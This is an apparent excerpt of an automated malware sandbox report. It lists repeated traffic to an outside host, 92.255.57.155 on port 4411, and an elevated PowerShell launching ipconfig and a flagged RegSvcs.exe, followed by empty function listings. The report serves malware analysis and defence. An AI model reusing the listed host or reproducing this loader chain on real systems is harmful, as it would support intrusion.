Dec 18, 2024 08:18:34.833813906 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:34.838093042 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:34.957735062 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:36.045969009 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:36.165821075 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:36.479150057 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:36.481823921 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:36.601546049 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:37.438093901 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:37.558013916 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:37.871432066 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:37.874172926 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:37.995177031 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:45.077061892 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:45.196974039 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:45.510716915 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:45.514127016 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:45.634282112 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:56.702001095 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:56.821883917 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:57.135571957 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:57.141140938 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:57.261709929 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:58.456984997 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:58.545453072 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:08.360177040 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:08.479876041 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:08.793859005 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:08.800193071 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:08.919997931 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:16.561474085 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:16.681483030 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:17.112171888 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:17.253400087 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:17.373033047 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:20.734181881 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:20.853813887 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:21.167140961 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:21.168993950 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:21.288633108 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:28.446367979 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:28.546215057 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:29.998960018 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:30.118959904 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:30.432749033 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:19:30.433857918 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:19:30.553673029 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 02:15:21 |
Start date: | 18/12/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff760310000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 02:15:21 |
Start date: | 18/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 02:15:24 |
Start date: | 18/12/2024 |
Path: | C:\Windows\System32\ipconfig.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff718340000 |
File size: | 35'840 bytes |
MD5 hash: | 62F170FB07FDBB79CEB7147101406EB8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 4 |
Start time: | 02:15:24 |
Start date: | 18/12/2024 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd50000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF887A537B5 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF887A5C3D5 Relevance: .0, Instructions: 44COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF887A55ADD Relevance: .0, Instructions: 17COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF887A59737 Relevance: .0, Instructions: 12COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 14.7% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 46 |
Total number of Limit Nodes: | 6 |
Graph
Function 015EB598 Relevance: .9, Instructions: 909COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015EC2D8 Relevance: .9, Instructions: 907COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015E8618 Relevance: .3, Instructions: 332COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015E5BC8 Relevance: .3, Instructions: 281COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015E6498 Relevance: .3, Instructions: 266COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015E8228 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015E7B7C Relevance: 1.6, APIs: 1, Instructions: 55COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015E82F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015E0FA0 Relevance: .3, Instructions: 260COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 015E5880 Relevance: .2, Instructions: 238COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|